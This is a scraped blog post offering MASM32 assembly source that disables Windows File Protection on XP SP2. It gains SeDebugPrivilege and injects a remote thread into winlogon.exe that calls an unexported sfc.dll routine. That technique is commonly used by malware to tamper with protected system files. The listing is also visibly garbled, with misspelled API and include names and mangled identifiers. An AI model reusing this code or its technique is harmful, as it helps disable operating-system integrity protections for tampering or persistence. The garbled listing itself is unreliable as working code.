2. Tech
  3. Turn off SFC [file protection] source code

Turn off SFC [file protection] source code

xiaoxiao2021-03-14  186

WindowsXP Professional SP2 test passes.

.386

.Model flat, stdcall

Option CaseMAP: NONE

INCLUDE /MASM32/INCLUDE/Windows.inc

INCLUDE /MASM32/INCLUDE/USER32.INC

INCLUDE /MASM32/INCLUDE/SHELL32.INC

INCLUDE /MASM32/INCLUDE / WANEL32.INC

Include /masm32/include/advapi32.inc

INCLUDELIB /MASM32/LIB/USER32.LIB

INCLUDELIB /MASM32/LIB/Shell32.lib

INCLUDELIB /MASM32/LIB/kernel32.lib

INCLUDELIB /MASM32/LIB/advapi32.lib

.DATA

StPROCESS DB "Winlogon.exe", 0

.DATA?

HFILE DD?

DWPROCESSID DD?

HPROCESS DD?

LPLOADLIBRARY DD?

LPDLLNAME DD?

SZDLLPATH DB 260 DUP (?)

SZSYSPATH DB 260 DUP (?)

HTOKEN DD?

Tkp token_privileges <>

SDNV Luid <>

.Code

Enabledebugpriv Proc

Invoke getCurrentProcess

Invoke openprocessToken, Eax, token_adjust_privileges or token_query, addr htokeen

Invoke Lookuppprivilerage, 0, CText ("SedbugPrivilege", AddR SDNV

Mov tkp.privilegect, 1

M2M Tkp.Privileges.luid.lowpart, SDNV.LOWPART

M2M Tkp.privileges.luid.highpart, SDNV.HIGHPART

Mov Tkp.privileges.attributes, SE_PRIVILE_ENABED

Invoke AdjustTokenprivileges, HToken, False, Addr TKP, Sizeof TKP, 0, 0

Invoke Closehandle, HTOKEN

RET

Enabledebugpriv ENDP

CloseSfc Proc

Local @stprocess: processentry32

Local @HSNAPSHOT

Local @hprocess

Local @HSFC

Invoke RTLZERMEMORY, AddR @ stprocess, SizeOf @stprocess

Mov @ stprocess.dwsize, sizeof @stprocess

Invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0

Mov @ hsnapshot, EAX

Invoke Process32First, @ hsnapshot, addr @stprocess

.While EAX

Invoke lstrcmpi, addr @ stprocess.szeefile, addr stprocess

.IF EAX == 0

Invoke openprocess, process_create_thread or process_vm_operation or process_vm_write, false, @ stprocess.th32processid

.if EAX

Mov @ HProcess, EAX

Invoke LoadLibrary, CText ("sfc.dll")

Mov @ HSFC, EAX

Invoke GetProcaddress, Eax, 2

Push EAX

Invoke Freelibrary, @ hsfc

POP EAX

.if EAX

Invoke CreateremoteThread, @ hprocess, 0,0, eax, 0,0,0

.if EAX

Invoke Closehandle, EAX

RET

.endif

.endif

.endif

.endif

Invoke Process32Next, @ hsnapshot, addr @stprocess

.Endw

Invoke Closehandle, @ hsnapshot

RET

CloseSfc ENDP

Start:

Call enabledebugpriv

Call CloseSFC

Invoke EXITPROCESS, 0

End Start

转载请注明原文地址:https://www.9cbs.com/read-129296.html

9cbs

New Post(0)